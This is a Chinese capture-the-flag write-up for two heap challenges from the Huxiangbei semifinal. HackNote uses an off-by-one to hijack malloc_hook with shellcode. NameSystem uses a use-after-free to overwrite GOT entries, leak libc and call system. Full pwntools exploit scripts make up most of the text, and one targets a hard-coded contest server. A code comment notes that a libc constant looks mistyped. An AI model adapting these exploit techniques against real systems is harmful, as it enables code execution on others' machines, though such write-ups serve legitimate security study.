湖湘杯复赛题目-writeup

还是要多刷多复现堆题啊

0x01 HackNote

分析

这道题是静态链接的。修改时用的是 strlen 计算长度，造成了 off-by-one，从而产生堆块重叠。然后把 chunk 分配到 main_arena 上，再修改 unsortedbin，最后把 chunk 分配到 malloc_hook。

exp

from pwn import *
sh = process('./HackNote')
# Attach a debugger before any interaction; the breakpoint address is
# absolute because, per the write-up, the binary is statically linked
# (verify it still matches the binary being analysed).
gdb.attach(sh,'b*0x400BFD')

# Hook addresses inside the static binary, copied from the write-up.
# Neither constant is referenced below: the script repeats 0x6CB788 as a
# literal instead, and free_hook is unused.
malloc_hook = 0x6CB788
free_hook = 0x6CD5E8

def add(size, content):
    """Select menu option 1, answer the size prompt, then send ``content``.

    ``content`` is sent raw (no newline appended), so callers include any
    terminator themselves.  Uses the module-level ``sh`` tube.
    """
    menu_sep = '-----------------\n'
    prompt = ':\n'
    sh.sendlineafter(menu_sep, '1')
    sh.sendlineafter(prompt, str(size))
    sh.sendafter(prompt, content)

def delete(idx):
    """Select menu option 2 and answer the index prompt with ``idx``.

    Uses the module-level ``sh`` tube.
    """
    menu_sep = '-----------------\n'
    prompt = ':\n'
    sh.sendlineafter(menu_sep, '2')
    sh.sendlineafter(prompt, str(idx))

def edit(idx, content):
    """Select menu option 3, choose slot ``idx``, then send ``content`` raw.

    No newline is appended to ``content``; callers add one if the program
    expects it.  Uses the module-level ``sh`` tube.
    """
    menu_sep = '-----------------\n'
    prompt = ':\n'
    sh.sendlineafter(menu_sep, '3')
    sh.sendlineafter(prompt, str(idx))
    sh.sendafter(prompt, content)
context(os = 'linux',arch = 'amd64')

# Everything below is one fixed sequence of menu interactions against the
# live process.  Each step depends on the heap state left by the previous
# ones, so the order must not be changed.  The trailing "#N" comments
# record which note slot each allocation is expected to occupy.

add(0x108, "a\n")#0
# Slot 1 carries the value 0x200 at offset 0x1f0 of its data — presumably a
# fake size used after the overlap described in the write-up (confirm).
add(0x220, "b" * 0x1f0 + p64(0x200) + "\n")#1
add(0x100, "c\n")#2
add(0x100,'d\n')#3

# Per the write-up, edit() measures its input with strlen(), so writing
# exactly 0x108 bytes into slot 0 spills one byte into the next chunk's
# header (off-by-one).  Slot 1 is freed between the two edits.
edit(0,0x108*'a')
delete(1)
edit(0,0x108*'a'+'\n')

# Re-split the freed space into three smaller notes (slots 1, 4, 5).
add(0xe0,'a\n') #1
add(0x50,'b\n') #4
add(0x60,'c\n') #5

delete(1)
delete(2)

# A 0x330-byte note that, per the write-up, overlaps the smaller chunks
# above, so editing it can rewrite their metadata.
add(0x330,'a\n') #1
delete(4)
delete(5)

# Through the overlapping slot 1, rewrite the freed chunks' contents;
# 0x6cb820 is an address inside main_arena (the write-up's target).
edit(1,'e'*0xe8 + p64(0x60)+p64(0x71)+p64(0)*10+p64(0x71)+p64(0x6cb820)+'\n')

add(0x50,'c\n') #4  write 0x71 into main_arena
add(0x60,'d\n') #5
# 0x6CB788 is the same value as the unused malloc_hook constant above.
add(0x60,p64(0) * 5 + p64(0x6CB788 - 0x10) + "\n" )#5  allocated inside main_arena; rewrites the unsortedbin
add(0x60, p64(0x6cb790) + asm(shellcraft.sh()) + "\n")#5  write shellcode into malloc_hook
# One more allocation through the menu (option 1, size 1), presumably to
# invoke the overwritten hook; it is sent by hand rather than via add()
# because no content prompt is expected to follow.
sh.sendlineafter('-----------------\n','1')
sh.sendlineafter(':\n','1')

sh.interactive()

0x02 NameSystem

这道题有个 UAF，一开始还真没看出来……先把 bss 段上的一个堆指针改成 got 表上的地址，再把 free 的 got 表项改成 puts@plt，从而可以泄露 libc，最后再把 free@got 改成 system，然后执行就可以获得 shell。

exp

from pwn import *

def add(size, content):
    """Choose menu item 1, answer the two name prompts, and wait for the menu.

    ``size`` is sent as a decimal string; ``content`` is sent with a trailing
    newline.  Uses the module-level ``r`` tube.
    """
    r.sendline("1")
    for prompt, answer in (("Name Size:", str(size)), ("Name:", content)):
        r.sendlineafter(prompt, answer)
    r.recvuntil("Your choice :\n")

def dele(index):
    """Choose menu item 3, answer the id prompt with ``index``, wait for the menu.

    Uses the module-level ``r`` tube.
    """
    choice = "3"
    id_prompt = "The id you want to delete:"
    menu_prompt = "Your choice :\n"
    r.sendline(choice)
    r.sendlineafter(id_prompt, str(index))
    r.recvuntil(menu_prompt)

#r = process("./NameSystem")
# NOTE: Python 2 script (print statement, str payloads).  The local process
# line above is kept commented out; the run below targets the hard-coded
# contest instance, so host/port and all addresses are specific to it.
r = remote("183.129.189.62", "15505")
r.recvuntil("Your choice :\n")

# Populate the first 18 slots with 0x40-byte names.
for i in range(18):
    add(0x40, "a")


add(0x60, "a")
add(0x60, "a")

# Slot 0 is deleted twice within this sequence (first and last call); the
# write-up attributes this to a UAF in the program's delete handler.
dele(0)
dele(18)
dele(17)
dele(19)
dele(0)

add(0x50, "a")
add(0x50, "a")

# Same delete pattern, now with 0x50-byte names in the freed slots.
dele(0)
dele(18)
dele(17)
dele(19)
dele(0)

add(0x30, "a")
add(0x30, "a")

# Same pattern with 0x30-byte names, followed by 13 further deletes of slot 0.
dele(0)
dele(18)
dele(17)
dele(19)
for i in range(13):
    dele(0)

# 0x60208d, 0x602060, 0x601ffa and 0x602008 are addresses in the contest
# binary (the bss heap pointer and GOT area the write-up refers to); they
# would need to be re-derived for any other build.
add(0x60, p64(0x60208d))
add(0x60, p64(0))
add(0x60, "/bin/sh\x00")
add(0x60, "\x00" * 3 + p64(0x602060))

add(0x50, p64(0x601ffa))
add(0x50, p64(0))
add(0x50, "/bin/sh\x00")
# 0x4006A0 is presumably puts@plt (the write-up says free@got is pointed at
# puts@plt here) — confirm against the binary.
add(0x50, "\x00" * 6 + p64(0x41) + p32(0x4006A0) + "\x00" * 3)

# Delete slot 0: with free@got redirected (per the write-up) this prints the
# slot's contents, which the next line reads as a libc pointer.
r.sendline("3")
r.sendlineafter("The id you want to delete:", str(0))

# NOTE(review): the two constants differ in width (0x7fb44b795000 has 12 hex
# digits, 0xa7fb44b7cbe80 has 13); the leading "a" in the second looks like a
# transcription error for the leaked address seen in a local run.  As
# written the subtraction does not yield a plausible base — verify.
libc = u64(r.recvuntil("\n").ljust(8, "\x00")) + 0x7fb44b795000 - 0xa7fb44b7cbe80

add(0x30, p64(0x602008))
add(0x30, p64(0))
add(0x30, "/bin/sh\x00")
# 0x45390 is presumably the offset of system in the contest libc; [:7] drops
# the top (zero) byte of the packed address — confirm both against the
# actual libc build.
add(0x30, p64(libc + 0x45390)[:7])

# Delete slot 15, presumably one holding "/bin/sh\x00", so the redirected
# free@got (now system, per the write-up) receives it.
r.sendline("3")
r.sendlineafter("The id you want to delete:", str(15))

#gdb.attach(r)
print "libc: " + hex(libc)

r.interactive()